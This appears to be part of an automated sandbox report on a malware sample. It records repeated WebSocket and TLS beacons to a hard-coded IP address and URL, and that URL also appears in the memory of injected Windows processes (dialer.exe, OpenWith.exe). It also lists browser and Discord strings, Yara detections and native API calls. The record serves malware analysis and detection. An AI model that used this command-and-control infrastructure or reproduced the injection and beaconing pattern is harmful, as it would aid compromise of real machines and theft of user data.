                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Uu0iaFdbG5AryZb
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: wmg987RLpbyqFSI
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Q3ZCdcjUNS1IbZW
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: YpfXF0WYwZtHMSW
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: gBYpLgo7UasXiuG
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: TYefaI1F0MWWonG
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: 2ku58F9dUSVrZha
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: kvd5dMCTf5mbuop
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: EbWxOS52DLQr2vF
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: f5cmLiHAmSPq8o0
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: oqscagi87YhXdh9
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: IDbbhmNh0FLcLVU
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:27 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:34 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:41 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:47 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:53 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:59 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:06 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:13 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:19 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:25 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:32 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:39 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:45 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:51 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:58 GMTContent-Length: 166Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:17:04 GMTContent-Length: 166Connection: close
                      Source: dialer.exe, 00000002.00000002.2240294940.00000000026EC000.00000004.00000010.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9
                      Source: dialer.exe, 00000002.00000002.2241516364.0000000004D2F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9kernelbasentdllkernel32GetProcessMitigationPolicyH
                      Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9x
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                      Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com
                      Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49699 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49718 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49720 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49721 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49723 version: TLS 1.2
                      Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_520ab8aa-e
                      Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_d15392e1-b
                      Source: Yara matchFile source: 0.3.wdeeFKntav.exe.45c0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.dialer.exe.4fd0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.dialer.exe.4db0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.wdeeFKntav.exe.47e0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.dialer.exe.4fd0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.wdeeFKntav.exe.47e0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.wdeeFKntav.exe.45c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.wdeeFKntav.exe.45c0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wdeeFKntav.exe PID: 5804, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: dialer.exe PID: 3544, type: MEMORYSTR
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_3_0000025B168230C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor,3_3_0000025B168230C7
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_0000025B14E215AC NtAcceptConnectPort,3_2_0000025B14E215AC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_0000025B14E20AC8 NtAcceptConnectPort,NtAcceptConnectPort,3_2_0000025B14E20AC8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_0000025B14E21CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification,3_2_0000025B14E21CD0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_0000025B14E21A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler,3_2_0000025B14E21A90
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F059F40 NtAcceptConnectPort,3_2_00007DF41F059F40
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F058D94 NtAcceptConnectPort,3_2_00007DF41F058D94
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F058C90 NtAcceptConnectPort,3_2_00007DF41F058C90
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F059CA0 _calloc_dbg,NtAcceptConnectPort,3_2_00007DF41F059CA0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F058C08 NtAcceptConnectPort,3_2_00007DF41F058C08
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F059AF4 _malloc_dbg,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z,3_2_00007DF41F059AF4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F058AFC NtAcceptConnectPort,3_2_00007DF41F058AFC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F058A40 NtAcceptConnectPort,3_2_00007DF41F058A40
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F05A600 NtAcceptConnectPort,3_2_00007DF41F05A600
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F05A540 NtAcceptConnectPort,3_2_00007DF41F05A540
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F05A2B0 NtAcceptConnectPort,3_2_00007DF41F05A2B0
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00CC0AA00_2_00CC0AA0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_3_0000025B16825E7C3_3_0000025B16825E7C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_3_0000025B1682557C3_3_0000025B1682557C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_3_0000025B168258FC3_3_0000025B168258FC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_3_0000025B1682279C3_3_0000025B1682279C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_3_0000025B16821BA63_3_0000025B16821BA6
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_3_0000025B16824A383_3_0000025B16824A38
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_3_0000025B16822C3C3_3_0000025B16822C3C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_3_0000025B168224F73_3_0000025B168224F7
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_0000025B14E20C5C3_2_0000025B14E20C5C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F045BD83_2_00007DF41F045BD8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F04BEC43_2_00007DF41F04BEC4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F07CEC43_2_00007DF41F07CEC4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0A6F203_2_00007DF41F0A6F20
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F11CF3C3_2_00007DF41F11CF3C
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F113DE03_2_00007DF41F113DE0
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F089E683_2_00007DF41F089E68
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F117CF43_2_00007DF41F117CF4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F088BE83_2_00007DF41F088BE8
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F031BFC3_2_00007DF41F031BFC
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F040C443_2_00007DF41F040C44
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F05EC443_2_00007DF41F05EC44
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F096B203_2_00007DF41F096B20
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F08A9C43_2_00007DF41F08A9C4
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F096A103_2_00007DF41F096A10
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F034A143_2_00007DF41F034A14
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F084A143_2_00007DF41F084A14
